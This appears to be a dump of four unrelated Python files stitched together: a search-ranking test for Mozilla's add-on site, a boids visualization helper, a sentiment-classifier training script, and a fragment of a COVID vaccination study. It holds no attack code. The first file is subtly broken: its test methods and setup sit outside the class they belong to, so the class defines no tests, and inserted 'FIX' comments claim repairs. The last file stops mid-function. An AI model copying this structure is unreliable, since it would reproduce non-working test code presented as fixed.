# NOTE: dataset-dump artifacts (markdown table header and repo tag) converted
# to comments so this file remains valid Python.
# source repo: g-k/addons-server (gh_stars: 0)
# -*- coding: utf-8 -*-
import json
from olympia import amo
from olympia.amo.tests import APITestClient, ESTestCase, reverse_ns
class TestRankingScenarios(ESTestCase):
    """Ranking regression scenarios run against the ElasticSearch-backed
    add-on search API endpoint."""
    # Use the API test client so requests go through the REST endpoints.
    client_class = APITestClient
def _check_scenario(self, query, expected, no_match=None):
    """Search for `query` and verify the ranking of the results.

    `expected` is an ordered sequence of add-on names that must appear
    at the top of the results, in that exact order.  `no_match`, if
    given, lists names that must not appear anywhere in the results.
    """
    # Make sure things are properly flushed and searchable
    search_url = reverse_ns('addon-search')
    response = self.client.get(search_url, {'q': query})
    assert response.status_code == 200
    results = json.loads(response.content)['results']

    def result_name(item):
        # Results carry localized names; the fixtures are all en-US.
        return item['name']['en-US']

    # We only check for greater or equal since we usually don't care
    # about what else ElasticSearch finds magically for any query.
    # We're mostly concerned about the first few results to check
    # our general ranking. In real-world the rest that follows matches
    # the general scoring idea.
    assert len(results) >= len(expected), (
        'Expected {} results but {} found for query "{}": {}'.format(
            len(expected), len(results), query,
            [result_name(x) for x in results]))

    for position, expected_name in enumerate(expected):
        actual_name = result_name(results[position])
        assert actual_name == expected_name, (
            'Expected "{}" to be on position {} but "{}" is for query {}'
            .format(expected_name, position, actual_name, query))

    if no_match is not None:
        for unwanted in no_match:
            names = [result_name(item) for item in results]
            assert unwanted not in names, (
                'Expected "{}" not to exist in results for query {}'
                .format(unwanted, query))
@classmethod
def setUpTestData(cls):
    """Create the add-on fixtures used by every ranking scenario.

    Fix: several factory-call statements carried stray trailing commas,
    turning each statement into a discarded 1-tuple; the commas are
    removed (no behavior change, but the tuples were misleading).
    """
    super(TestRankingScenarios, cls).setUpTestData()
    # This data was taken from our production add-ons to test
    # a few search scenarios. (2018-01-25)
    amo.tests.addon_factory(
        average_daily_users=18981,
        description=None,
        name='Tab Center Redux',
        slug=u'tab-center-redux',
        summary='Move your tabs to the side of your browser window.',
        weekly_downloads=915)
    amo.tests.addon_factory(
        average_daily_users=468126,
        description=None,
        name='Tab Mix Plus',
        slug=u'tab-mix-plus',
        summary=(
            'Tab Mix Plus enhances Firefox\'s tab browsing capabilities. '
            'It includes such features as duplicating tabs, controlling '
            'tab focus, tab clicking options, undo closed tabs and '
            'windows, plus much more. It also includes a full-featured '
            'session manager.'),
        weekly_downloads=3985)
    amo.tests.addon_factory(
        average_daily_users=8838,
        description=None,
        name='Redux DevTools',
        slug=u'remotedev',
        summary=(
            'DevTools for Redux with actions history, undo and replay.'),
        weekly_downloads=1032)
    amo.tests.addon_factory(
        average_daily_users=482,
        description=None,
        name='Open Image in New Tab',
        slug=u'open-image-new-tab',
        summary='Adds a context menu to open images in a new tab.',
        weekly_downloads=158)
    amo.tests.addon_factory(
        average_daily_users=2607,
        description=None,
        name='Open image in a new tab',
        slug=u'open-image-in-a-new-tab',
        summary='A context menu to open images in a new tab',
        weekly_downloads=329)
    amo.tests.addon_factory(
        average_daily_users=27832,
        description=None,
        name='Open Bookmarks in New Tab',
        slug=u'open-bookmarks-in-new-tab',
        summary=(
            'After you installed this addon to your Firefox, bookmarks '
            'are opened in new tab always.'),
        weekly_downloads=145)
    amo.tests.addon_factory(
        average_daily_users=528,
        description=None,
        name='Coinhive Blocker',
        slug=u'coinhive-blocker',
        summary='Coinhive mining blocker',
        weekly_downloads=132)
    amo.tests.addon_factory(
        average_daily_users=3015,
        description=None,
        name='CoinBlock',
        slug=u'coinblock',
        summary=(
            'With the rising popularity of coinminers in js form, this '
            'extension attempts to block those hosted on coin-hive, and '
            'cryptoloot.\nA multiple entry block list is planned.'),
        weekly_downloads=658)
    amo.tests.addon_factory(
        average_daily_users=418,
        description=None,
        name='NoMiners',
        slug=u'nominers',
        summary=(
            'NoMiners is an Add-on that tries to block cryptominers such '
            'as coinhive.\n\nBlocking those pesky miner scripts will '
            'relieve your CPU and BATTERY while browsing the web.'
            '\n\nIt\'s open source, so feel free to check out the code '
            'and submit improvements.'),
        weekly_downloads=71)
    amo.tests.addon_factory(
        average_daily_users=399485,
        description=None,
        name='Privacy Badger',
        slug=u'privacy-badger17',
        summary=(
            'Protects your privacy by blocking spying ads and invisible '
            'trackers.'),
        weekly_downloads=22931)
    amo.tests.addon_factory(
        average_daily_users=8728,
        description=None,
        name='Privacy Pass',
        slug=u'privacy-pass',
        summary=(
            'Handles passes containing cryptographically blinded tokens '
            'for bypassing challenge pages.'),
        weekly_downloads=4599)
    amo.tests.addon_factory(
        average_daily_users=15406,
        description=None,
        name='Privacy Settings',
        slug=u'privacy-settings',
        summary=(
            'Alter Firefox\'s built-in privacy settings easily with a '
            'toolbar panel.'),
        weekly_downloads=1492)
    amo.tests.addon_factory(
        average_daily_users=12857,
        description=None,
        name='Google Privacy',
        slug=u'google-privacy',
        summary=(
            'Make some popular websites respect your privacy settings.\n'
            'Please see the known issues below!'),
        weekly_downloads=117)
    amo.tests.addon_factory(
        average_daily_users=70553,
        description=None,
        name='Blur',
        slug=u'donottrackplus',
        summary='Protect your Passwords, Payments, and Privacy.',
        weekly_downloads=2224)
    amo.tests.addon_factory(
        average_daily_users=1009156,
        description=None,
        name='Ghostery',
        slug=u'ghostery',
        summary=(
            u'See who’s tracking you online and protect your privacy with '
            u'Ghostery.'),
        weekly_downloads=49315)
    amo.tests.addon_factory(
        average_daily_users=954288,
        description=None,
        name='Firebug',
        slug=u'firebug',
        summary=(
            'Firebug integrates with Firefox to put a wealth of '
            'development tools at your fingertips while you browse. You '
            'can edit, debug, and monitor CSS, HTML, and JavaScript live '
            'in any web page...'),
        weekly_downloads=21969)
    amo.tests.addon_factory(
        average_daily_users=10821,
        description=None,
        name='Firebug Autocompleter',
        slug=u'firebug-autocompleter',
        summary='Firebug command line autocomplete.',
        weekly_downloads=76)
    amo.tests.addon_factory(
        average_daily_users=11992,
        description=None,
        name='Firefinder for Firebug',
        slug=u'firefinder-for-firebug',
        summary=(
            'Finds HTML elements matching chosen CSS selector(s) or XPath '
            'expression'),
        weekly_downloads=358)
    amo.tests.addon_factory(
        average_daily_users=8200,
        description=None,
        name='Fire Drag',
        slug=u'fire-drag',
        summary='drag texts and links with/without e10s',
        weekly_downloads=506)
    amo.tests.addon_factory(
        average_daily_users=61014,
        description=None,
        name='Menu Wizard',
        slug=u's3menu-wizard',
        summary=(
            'Customizemenus=Helps removing, moving and renaming menus and '
            'menu items\nColorize important menu for ease of use! (use '
            'Style (CSS))\nChange or disable any of used keyboard '
            'shortcutsnSuppor=Firefox, Thunderbird and SeaMonkey'),
        weekly_downloads=927)
    amo.tests.addon_factory(
        average_daily_users=81237,
        description=None,
        name='Add-ons Manager Context Menu',
        slug=u'am-context',
        summary='Add more items to Add-ons Manager context menu.',
        weekly_downloads=169)
    amo.tests.addon_factory(
        average_daily_users=51,
        description=None,
        name='Frame Demolition',
        slug=u'frame-demolition',
        summary=(
            'Enabling route to load abstracted file layer in select '
            'sites.'),
        weekly_downloads=70)
    amo.tests.addon_factory(
        average_daily_users=99,
        description=None,
        name='reStyle',
        slug=u're-style',
        summary=(
            'A user style manager which can load local files and apply UI '
            'styles even in Firefox 57+'),
        weekly_downloads=70)
    amo.tests.addon_factory(
        average_daily_users=150,
        description=None,
        name='MegaUpload DownloadHelper',
        slug=u'megaupload-downloadhelper',
        summary=(
            'Download from MegaUpload.\nMegaUpload Download Helper will '
            'start your download once ready.\nMegaUpload Download Helper '
            'will monitor time limitations and will auto-start your '
            'download.'),
        weekly_downloads=77)
    amo.tests.addon_factory(
        average_daily_users=2830,
        description=None,
        name='RapidShare DownloadHelper',
        slug=u'rapidshare-downloadhelper',
        summary=(
            'Note from Mozilla: This add-on has been discontinued. Try '
            '<a rel="nofollow" href="https://addons.mozilla.org/firefox/'
            'addon/rapidshare-helper/">Rapidshare Helper</a> instead.\n\n'
            'RapidShare Download Helper will start your download once '
            'ready.'),
        weekly_downloads=125)
    amo.tests.addon_factory(
        average_daily_users=98716,
        description=None,
        name='Popup Blocker',
        slug=u'popup_blocker',
        summary=(
            'Prevents your web browser from opening a new window on top '
            'of the content or web site you are viewing. The Addon also '
            'supresses unwanted advertisement windows on your screen. '
            'The one deciding what consitutes a popup is the user.'),
        weekly_downloads=3940)
    amo.tests.addon_factory(
        average_daily_users=8830,
        description=None,
        name='No Flash',
        slug=u'no-flash',
        summary=(
            'Replace Youtube, Vimeo and Dailymotion Flash video players '
            'embedded on third-party website by the HTML5 counterpart '
            'when the content author still use the old style embed '
            '(Flash).\n\nSource code at <a rel="nofollow" href="https://'
            'outgoing.prod.mozaws.net/v1/14b404a3c05779fa94b24e0bffc0d710'
            '6836f1d6b771367b065fb96e9c8656b9/https%3A//github.com/hfigui'
            'ere/no-flash">https://github.com/hfiguiere/no-flash</a>'),
        weekly_downloads=77)
    amo.tests.addon_factory(
        average_daily_users=547880,
        description=None,
        name='Download Flash and Video',
        slug=u'download-flash-and-video',
        summary=(
            'Download Flash and Video is a great download helper tool '
            'that lets you download Flash games and Flash videos '
            '(YouTube, Facebook, Dailymotion, Google Videos and more) '
            'with a single click.\nThe downloader is very easy to use.'),
        weekly_downloads=65891)
    amo.tests.addon_factory(
        average_daily_users=158796,
        description=None,
        name='YouTube Flash Video Player',
        slug=u'youtube-flash-video-player',
        summary=(
            'YouTube Flash Video Player is a powerful tool that will let '
            'you choose Flash video player as default YouTube video '
            'player.'),
        weekly_downloads=12239)
    amo.tests.addon_factory(
        average_daily_users=206980,
        description=None,
        name='YouTube Flash Player',
        slug=u'youtube-flash-player',
        summary=(
            u'A very lightweight add-on that allows you to watch YouTube™ '
            u'videos using Flash® Player instead of the '
            u'default HTML5 player. The Flash® Player will consume less '
            u'CPU and RAM resources if your device doesn\'t easily '
            u'support HTML5 videos. Try it!'),
        weekly_downloads=21882)
    amo.tests.addon_factory(
        average_daily_users=5056, description=None,
        name='Disable Hello, Pocket & Reader+',
        slug=u'disable-hello-pocket-reader',
        summary=(
            'Turn off Pocket, Reader, Hello and WebRTC bloatware - keep '
            'browser fast and clean'),
        weekly_downloads=85)
    amo.tests.addon_factory(
        average_daily_users=26135,
        description=None,
        name='Reader',
        slug=u'reader',
        summary='Reader is the ultimate Reader tool for Firefox.',
        weekly_downloads=2463)
    amo.tests.addon_factory(
        average_daily_users=53412,
        description=None,
        name='Disable WebRTC',
        slug=u'happy-bonobo-disable-webrtc',
        summary=(
            'WebRTC leaks your actual IP addresses from behind your VPN, '
            'by default.'),
        weekly_downloads=10583)
    amo.tests.addon_factory(
        average_daily_users=12953,
        description=None,
        name='In My Pocket',
        slug=u'in-my-pocket',
        summary=(
            'For all those who are missing the old Firefox Pocket addon, '
            'and not satisfied with the new Pocket integration, here is '
            'an unofficial client for the excellent Pocket service. '
            'Hope you\'ll enjoy it!'),
        weekly_downloads=1123)
    amo.tests.addon_factory(
        name='GrApple Yummy')
    amo.tests.addon_factory(
        name='Delicious Bookmarks')
    # Some more or less Dummy data to test a few very specific scenarios
    # e.g for exact name matching
    amo.tests.addon_factory(
        name='Merge Windows', type=amo.ADDON_EXTENSION,
        average_daily_users=0, weekly_downloads=0)
    amo.tests.addon_factory(
        name='Merge All Windows', type=amo.ADDON_EXTENSION,
        average_daily_users=0, weekly_downloads=0)
    amo.tests.addon_factory(
        name='All Downloader Professional', type=amo.ADDON_EXTENSION,
        average_daily_users=0, weekly_downloads=0)
    amo.tests.addon_factory(
        name='test addon test11', type=amo.ADDON_EXTENSION,
        average_daily_users=0, weekly_downloads=0)
    amo.tests.addon_factory(
        name='test addon test21', type=amo.ADDON_EXTENSION,
        average_daily_users=0, weekly_downloads=0)
    amo.tests.addon_factory(
        name='test addon test31', type=amo.ADDON_EXTENSION,
        average_daily_users=0, weekly_downloads=0)
    amo.tests.addon_factory(
        name='1-Click YouTube Video Download',
        type=amo.ADDON_EXTENSION,
        average_daily_users=566337, weekly_downloads=150000,
        description=(
            'button, click that button, 1-Click Youtube Video '
            'Downloader is a click click great tool'))
    amo.tests.addon_factory(
        name='Amazon 1-Click Lock', type=amo.ADDON_EXTENSION,
        average_daily_users=50, weekly_downloads=0)
    # Index everything that was just created so searches can see it.
    cls.refresh()
def test_scenario_tab_center_redux(self):
    # The exact-name match is expected above the partial "Tab"/"Redux" hits.
    self._check_scenario('tab center redux', (
        'Tab Center Redux',
        'Tab Mix Plus',
        'Redux DevTools',
    ))
def test_scenario_open_image_new_tab(self):
    # Documents current (imperfect) ordering between two near-identical names.
    # TODO, should not put the "a new tab" thing first :-/
    self._check_scenario('Open Image in New Tab', (
        'Open image in a new tab',
        'Open Image in New Tab',
    ))
def test_scenario_coinhive(self):
    # Name match first; NoMiners matches "coinhive" via its summary text.
    # TODO, should match "CoinBlock"
    self._check_scenario('CoinHive', (
        'Coinhive Blocker',
        'NoMiners',  # via description
        # 'CoinBlock',  # via prefix search
    ))
def test_scenario_privacy(self):
    # Name matches rank above summary-only matches regardless of user counts.
    self._check_scenario('Privacy', (
        'Privacy Badger',
        'Privacy Settings',
        'Google Privacy',  # More users, summary
        'Privacy Pass',
        'Ghostery',  # Crazy amount of users, summary
        'Blur',  # summary + many users but not as many as ghostery
    ))
def test_scenario_firebu(self):
    # Prefix query: truncated "firebug" should still surface the family.
    self._check_scenario('firebu', (
        'Firebug',
        # unclear why preference to Firebug Autocompleter,
        # weekly downloads + users?
        'Firefinder for Firebug',
        'Firebug Autocompleter',
        'Fire Drag',
    ))
def test_scenario_fireb(self):
    # Even shorter prefix than test_scenario_firebu; same expected ordering.
    self._check_scenario('fireb', (
        'Firebug',
        'Firefinder for Firebug',
        'Firebug Autocompleter',
        'Fire Drag',
    ))
def test_scenario_menu_wizzard(self):
    # Misspelled query ("Wizzard") should still fuzzy-match "Menu Wizard".
    self._check_scenario('Menu Wizzard', (
        'Menu Wizard',  # (fuzzy, typo)
        'Add-ons Manager Context Menu',  # partial match + users
    ))
def test_scenario_frame_demolition(self):
    # Plain exact-name lookup.
    self._check_scenario('Frame Demolition', (
        'Frame Demolition',
    ))
def test_scenario_demolition(self):
    # Find "Frame Demolition" via a typo
    self._check_scenario('Demolation', (
        'Frame Demolition',
    ))
def test_scenario_restyle(self):
    # Mixed-case single-word name lookup.
    self._check_scenario('reStyle', (
        'reStyle',
    ))
def test_scenario_megaupload_downloadhelper(self):
    # Doesn't find "RapidShare DownloadHelper" anymore
    # since we now query by "MegaUpload AND DownloadHelper"
    self._check_scenario('MegaUpload DownloadHelper', (
        'MegaUpload DownloadHelper',
    ))
def test_scenario_downloadhelper(self):
    # No direct match, "Download Flash and Video" has
    # huge amount of users that puts it first here
    self._check_scenario('DownloadHelper', (
        'Download Flash and Video',
        '1-Click YouTube Video Download',
        'RapidShare DownloadHelper',
        'MegaUpload DownloadHelper',
    ))
def test_scenario_megaupload(self):
    # Documents a currently-surprising ordering (see TODO below).
    self._check_scenario('MegaUpload', (
        # TODO: I have litterally NO idea :-/
        'Popup Blocker',
        'MegaUpload DownloadHelper',
    ))
def test_scenario_no_flash(self):
    # TODO: Doesn't put "No Flash" on first line, does the "No"
    # do something special here?
    self._check_scenario('No Flash', (
        'Download Flash and Video',
        'YouTube Flash Player',
        'YouTube Flash Video Player',
        'No Flash'
    ))
def test_scenario_disable_hello_pocket_reader_plus(self):
    # Punctuation-heavy exact-name query should still match exactly.
    self._check_scenario('Disable Hello, Pocket & Reader+', (
        'Disable Hello, Pocket & Reader+',  # yeay!
    ))
def test_scenario_grapple(self):
    """Making sure this scenario works via the API,
    see `legacy_api.SearchTest` for various examples.
    """
    # Case-insensitive match against the "GrApple Yummy" fixture.
    self._check_scenario('grapple', (
        'GrApple Yummy',
    ))
def test_scenario_delicious(self):
    """Making sure this scenario works via the API,
    see `legacy_api.SearchTest` for various examples.
    """
    # Single-word partial-name match.
    self._check_scenario('delicious', (
        'Delicious Bookmarks',
    ))
def test_score_boost_name_match(self):
    # Tests that we match directly "Merge Windows" and also find
    # "Merge All Windows" because of slop=1
    self._check_scenario('merge windows', (
        'Merge Windows',
        'Merge All Windows',
    ), no_match=(
        'All Downloader Professional',
    ))
    # With the extra word all three fixtures match; exact phrase wins.
    self._check_scenario('merge all windows', (
        'Merge All Windows',
        'Merge Windows',
        'All Downloader Professional',
    ))
def test_score_boost_exact_match(self):
    """Test that we rank exact matches at the top."""
    # "test21" should beat the sibling fixtures test11/test31.
    self._check_scenario('test addon test21', (
        'test addon test21',
    ))
def test_score_boost_exact_match_description_hijack(self):
    """Test that we rank exact matches at the top."""
    # The "1-Click" fixture's keyword-stuffed description must not
    # outrank the exact name match.
    self._check_scenario('Amazon 1-Click Lock', (
        'Amazon 1-Click Lock',
        '1-Click YouTube Video Download',
    ))
# --- file boundary (dataset-dump artifact) ---
# source: zwrankin/vivarium_examples — src/vivarium_examples/boids/visualization.py
import matplotlib.pyplot as plt
from matplotlib import animation
import os
import shutil
import imageio
def plot_birds(simulation, plot_velocity=False):
    """Scatter-plot the current bird positions on the simulation area.

    When `plot_velocity` is true, a velocity arrow (quiver) is drawn per
    bird as well.  Pops up a matplotlib window via ``plt.show()``.
    """
    location = simulation.configuration.location
    area_width = location.width
    area_height = location.height
    birds = simulation.population.population

    plt.figure(figsize=[12, 12])
    plt.scatter(birds.x, birds.y, color=birds.color)
    if plot_velocity:
        plt.quiver(birds.x, birds.y, birds.vx, birds.vy,
                   color=birds.color, width=0.002)
    plt.xlabel('x')
    plt.ylabel('y')
    # Clamp the axes to the configured simulation bounds.
    plt.axis([0, area_width, 0, area_height])
    plt.show()
# Fixed palette mapping a small integer state (used below for either the
# 'cluster' id or the 'infected' value) to a matplotlib color name.
color_map = {0: 'black', 1: 'red', 2: 'blue', 3: 'yellow', 4: 'green', 5: 'brown', 6: 'gray', 7: 'orange'}
class SaveFrames:
    """
    Save one frame per step, that is assembled into GIF at simulation_end.

    NOTE - it seems that the simulation_end event doesn't fire during
    interactive runs, in which case you must manually knit after simulation.
    This component is a hacky way to get around the bugs I'm having with
    MovieWriter (e.g. it doesn't work on Windows).

    :param fname: repo within which frames and gif will be saved
        (e.g. 'test' will save '/output/test/movie.gif')
    :param plot_type: whether to plot color as cluster or infection
    """
    def __init__(self, fname='test', plot_type='infection'):
        self.fname = fname
        self.plot_type = plot_type
        # Frame counter; starts at 1 and is incremented after each saved
        # frame, so it is always one ahead of the number of frames written.
        self.step = 1
        self.path = f'output/{self.fname}'
        if not os.path.exists('output'):
            os.mkdir('output')
        # Start each run from an empty frame directory.
        shutil.rmtree(self.path, ignore_errors=True)
        os.mkdir(self.path)

    def setup(self, builder):
        # vivarium component hook: cache plot bounds, subscribe to events,
        # and request a population view of just the columns we plot.
        self.width = builder.configuration.location.width
        self.height = builder.configuration.location.height
        builder.event.register_listener('time_step',
            self.on_time_step)  # priority??? Before or after they actually move?
        builder.event.register_listener('simulation_end', self.save_movie)
        cols = ['x', 'y', 'vx', 'vy']
        if self.plot_type == 'cluster':
            cols.append('cluster')
        elif self.plot_type == 'infection':
            cols.append('infected')
        self.population_view = builder.population.get_view(cols)

    def on_time_step(self, event):
        # Render the current population state and save it as one PNG frame.
        pop = self.population_view.get(event.index)
        if self.plot_type == 'cluster':
            pop['color'] = pop.cluster.map(color_map)
        elif self.plot_type == 'infection':
            pop['color'] = pop.infected.map(color_map)
        else:
            raise AssertionError(f'{self.plot_type} not recognized')
        plt.clf()
        self.plot_boids(pop)
        plt.savefig(f'{self.path}/step_{self.step}.png')
        self.step += 1

    def plot_boids(self, pop):
        # Scatter positions plus velocity arrows, clamped to the sim bounds.
        plt.figure(figsize=[12, 12])
        plt.scatter(pop.x, pop.y, color=pop.color)
        plt.quiver(pop.x, pop.y, pop.vx, pop.vy, color=pop.color, width=0.002)
        plt.xlabel('x')
        plt.ylabel('y')
        plt.axis([0, self.width, 0, self.height])

    def save_movie(self, event):
        # Assemble all saved PNG frames, in step order, into a single GIF.
        # NOTE - 'simulation_end' event doesn't seem to fire in interactive mode
        # Here's a hack to turn frames into gif after sim
        # import imageio
        # image_directory = 'images/test'
        # images = [i for i in os.listdir(image_directory) if 'png' in i]
        # images = [f'step_{i}.png' for i in range(1, len(images) + 1)]
        # with imageio.get_writer(f'{image_directory}/movie.gif', mode='I', fps=2) as writer:
        #     for i in images:
        #         image = imageio.imread(f'{image_directory}/{i}', format='png')
        #         writer.append_data(image)
        images = [f'step_{i}.png' for i in range(1, self.step)]  # Note that self.step is 1 greater than number of steps
        with imageio.get_writer(f'{self.path}/movie.gif', mode='I', fps=2) as writer:
            for i in images:
                image = imageio.imread(f'{self.path}/{i}', format='png')
                writer.append_data(image)
class MovieWriter:
    """
    DOESN'T WORK!
    Saves a gif of simulation.
    Something about animation's subprocess backend doesn't seem to work on
    Windows. Getting a different bug on cluster, haven't debugged yet.
    """
    def __init__(self, fname, plot_type='infection'):
        # ImageMagickWriter shells out to ImageMagick; that subprocess call
        # is the part reported broken above.
        self.moviewriter = animation.ImageMagickWriter(fps=2)
        self.fname = f'output/{fname}'
        self.plot_type = plot_type
        if not os.path.exists('output'):
            os.mkdir('output')

    def __enter__(self):
        # Context-manager entry: bind the writer to a fresh figure/output file.
        fig = plt.figure()
        self.moviewriter.setup(fig, self.fname, dpi=100)
        return self

    def setup(self, builder):
        # vivarium component hook: cache plot bounds, subscribe to time_step,
        # and request a population view of just the columns we plot.
        self.width = builder.configuration.location.width
        self.height = builder.configuration.location.height
        builder.event.register_listener('time_step', self.on_time_step)
        cols = ['x', 'y', 'vx', 'vy']
        if self.plot_type == 'cluster':
            cols.append('cluster')
        elif self.plot_type == 'infection':
            cols.append('infected')
        self.population_view = builder.population.get_view(cols)

    def on_time_step(self, event):
        # Render the current population state and capture it as a movie frame.
        pop = self.population_view.get(event.index)
        if self.plot_type == 'cluster':
            pop['color'] = pop.cluster.map(color_map)
        elif self.plot_type == 'infection':
            pop['color'] = pop.infected.map(color_map)
        else:
            raise AssertionError(f'{self.plot_type} not recognized')
        plt.clf()
        self.plot_boids(pop)
        self.moviewriter.grab_frame()

    def plot_boids(self, pop):
        # Scatter positions plus velocity arrows, clamped to the sim bounds.
        plt.figure(figsize=[12, 12])
        plt.scatter(pop.x, pop.y, color=pop.color)
        plt.quiver(pop.x, pop.y, pop.vx, pop.vy, color=pop.color, width=0.002)
        plt.xlabel('x')
        plt.ylabel('y')
        plt.axis([0, self.width, 0, self.height])

    def __exit__(self, exception_type, exception_value, traceback):
        # Context-manager exit: finalize and flush the movie file.
        self.moviewriter.finish()
# --- file boundary (dataset-dump artifact): sentiment-classifier train script ---
import os
import argparse
import numpy as np
import torch
from torch.utils.data import DataLoader
from model import get_rnn_model, DNN
from util import *
from manager import Manager
# Fixed seed for reproducible weight init / shuffling.
torch.manual_seed(1004)

# Command-line interface. Paths default to the homework data layout.
parser = argparse.ArgumentParser()
parser.add_argument('mode', choices=['train', 'predict', 'ensemble', 'bow'])
# FIX: a positional argument ignores `default=` unless nargs='?' is set;
# without it, `config` was required and the 'simple' default was dead.
parser.add_argument('config', nargs='?', help='Symbol of model configuration', default='simple')
parser.add_argument('-train_x', help='Path to train_x.csv', default='../../data_hw6/train_x.csv')
parser.add_argument('-train_y', help='Path to train_y.csv', default='../../data_hw6/train_y.csv')
parser.add_argument('-test_x', help='Path to test_x.csv', default='../../data_hw6/test_x.csv')
parser.add_argument('-dict', help='Path to dictionary', default='../../data_hw6/dict.txt.big')
parser.add_argument('-word_model', help='Path to Word model', default='../../data_hw6/word2vec_2.model')
# FIX: typo in user-visible help text ('learnig' -> 'learning').
parser.add_argument('-lr', help='learning rate', type=float, default=1e-3)
parser.add_argument('-epoch', help='Epoch number', type=int, default=7)
parser.add_argument('-batch_size', type=int, default=32)
parser.add_argument('-seq_len', type=int, help='Sequence length for each data', default=40)
parser.add_argument('-save', help='Path to save model')
parser.add_argument('-load', help='Path to load model')
parser.add_argument('-record', help='Path to file for recording result')
parser.add_argument('-predict', help='Path to prediction file')
args = parser.parse_args()
if __name__ == '__main__':
    # Default RNN model; the 'bow' mode replaces it with a DNN below, and
    # 'ensemble' rebuilds it per configuration.
    model = get_rnn_model(args.config, args.batch_size)

    if args.mode == 'train':
        print('= Training =')
        train_words = WordsData(mode='train', x_path=args.train_x, y_path=args.train_y,
                                model_path=args.word_model, dict_path=args.dict, seq_len=args.seq_len)
        valid_words = WordsData(mode='valid', x_path=args.train_x, y_path=args.train_y,
                                model_path=args.word_model, dict_path=args.dict, seq_len=args.seq_len)
        train_data = DataLoader(train_words, batch_size=args.batch_size, shuffle=True)
        valid_data = DataLoader(valid_words, batch_size=args.batch_size, shuffle=False)
        model_manager = Manager(model, args)
        model_manager.train(train_data, valid_data)

    elif args.mode == 'predict':
        print('= Predicting =')
        test_words = WordsData(mode='test', x_path=args.test_x, y_path=None,
                               model_path=args.word_model, dict_path=args.dict, seq_len=args.seq_len)
        test_data = DataLoader(test_words, batch_size=args.batch_size, shuffle=False)
        model_manager = Manager(model, args)
        model_manager.predict(test_data, args.predict)

    elif args.mode == 'ensemble':
        # Majority vote over (model config, sequence length) combinations:
        # each run adds its 0/1 predictions to `scores`; a sample is labeled
        # 1 when more than half of the runs voted 1.
        test_num = 20000
        seq_len_list = [40, 50, 60, 80, 100]
        model_weight_pair = {
            'simple': '0508_1.pkl',
            # 'A': '0508_2.pkl',
            'B': '0508_3.pkl',
            'C': '0508_4.pkl'
        }
        scores = np.zeros((test_num,))
        threshold = len(seq_len_list) * len(model_weight_pair) / 2
        for m_name, w_name in model_weight_pair.items():
            model = get_rnn_model(m_name, args.batch_size)
            args.load = w_name  # weights are loaded relative to the cwd
            model_manager = Manager(model, args)
            for seq_len in seq_len_list:
                test_words = WordsData(mode='test', x_path=args.test_x, y_path=None,
                                       model_path=args.word_model, dict_path=args.dict, seq_len=seq_len)
                test_data = DataLoader(test_words, batch_size=args.batch_size, shuffle=False)
                scores += model_manager.get_all_predictions(test_data)
        # FIX: use a context manager so the prediction file is flushed and
        # closed (the original opened it and never closed it).
        with open(args.predict, 'w') as file:
            file.write('id,label\n')
            for i, score in enumerate(scores):
                pred = 1 if score > threshold else 0
                file.write('{},{}\n'.format(i, pred))

    elif args.mode == 'bow':
        # Bag-of-words baseline with a plain DNN instead of the RNN.
        model = DNN()
        train_words = BOW(mode='train', x_path=args.train_x, y_path=args.train_y)
        valid_words = BOW(mode='valid', x_path=args.train_x, y_path=args.train_y)
        train_data = DataLoader(train_words, batch_size=args.batch_size, shuffle=True)
        valid_data = DataLoader(valid_words, batch_size=args.batch_size, shuffle=False)
        manager = Manager(model, args)
        manager.train(train_data, valid_data)
# --- file boundary (dataset-dump artifact) ---
# source repo: COVID-IWG/epimargin-studies
from itertools import chain, product
from functools import lru_cache
import epimargin.plots as plt
from studies.age_structure.TN_CMIE.commons import *
from studies.age_structure.TN_CMIE.epi_simulations import *
# data loading
# Per-age-bin population columns (one dict per "N_<i>" column), keyed by
# district, plus the statewide total population.
N_jk_dicts = districts_to_run.filter(like = "N_", axis = 1).to_dict()
N_TN = districts_to_run.N_tot.sum()
def parse_tag(tag):
    """Split a ``"<phi>_<policy>"`` tag at the first underscore into a
    tuple, converting purely numeric pieces to ``int``."""
    head, sep, tail = tag.partition("_")
    pieces = [head] + ([tail] if sep else [])
    return tuple(int(piece) if piece.isnumeric() else piece for piece in pieces)
def load_metrics(filename):
    """Load an ``.npz`` archive and key each stored array by its parsed tag."""
    archive = np.load(filename)
    metrics = {}
    for key in archive.files:
        metrics[parse_tag(key)] = archive[key]
    return metrics
def map_pop_dict(agebin, district):
    """Population of one age bin within one district, looked up via the
    matching ``N_<i>`` column dictionary."""
    bin_index = age_bin_labels.index(agebin)
    return N_jk_dicts[f"N_{bin_index}"][district]
def export_WB():
    """Build the per-district, age-binned WTP table (USD per capita) for the
    50th percentile of the "random" assignment policy.

    Returns the assembled DataFrame with columns
    ``["district", "metric"] + age_bin_labels``.
    """
    TN_pop_df = districts_to_run.filter(regex = "N_[0-6]", axis = 1)
    # per-capita USD WTP per age bin, restricted to (percentile=50, policy=random)
    age_dist_wtp = {
        k1: v * USD / TN_pop_df.loc[k1].values
        for ((k1, k2, k3), v) in per_district_WTP_percentiles.items()
        if (k2, k3) == (50, "random")
    }
    # one row per (district, metric) with age-bin values spread across columns
    age_dist_wtp_flat = list(chain(
        [k, op, *v[i]]
        for (i, op) in enumerate(["median", "lo", "hi"])
        for (k, v) in age_dist_wtp.items()
    ))
    # FIX: the DataFrame was previously constructed and discarded (the
    # function returned None); return it so callers can actually export it.
    return pd.DataFrame(age_dist_wtp_flat).rename(
        columns = dict(enumerate(["district", "metric"] + age_bin_labels)))
# calculations
def get_wtp_ranking(district_WTP):
    """Return a memoized function that ranks (district, age bin) cells by
    per-capita WTP (USD), per time step, for a given (phi, policy) pair.

    `district_WTP` maps (district, "phi_policy" tag) -> array of WTP draws.
    """
    @lru_cache
    def ranking(phi, vax_policy = "random"):
        # Median over simulation draws, one frame per matching district,
        # reshaped long: one row per (t, district, agebin).
        all_wtp = pd.concat([
            pd.DataFrame(np.median(v, axis = 1))\
                .assign(district = district)\
                .reset_index()\
                .rename(columns = {"index": "t"})\
                .rename(columns = dict(enumerate(age_bin_labels)))\
                .set_index(["t", "district"])
            for ((district, tag), v) in district_WTP.items()
            if tag == f"{phi}_{vax_policy}"
        ], axis = 0)\
            .stack()\
            .reset_index()\
            .rename(columns = {"level_2": "agebin", 0: "agg_wtp"})
        # negated t so the later sort is ascending-in-time, descending-in-WTP
        all_wtp["_t"] = -all_wtp["t"]
        all_wtp["pop"] = [map_pop_dict(b, d) for (b, d) in all_wtp[["agebin", "district"]].itertuples(index = False)]
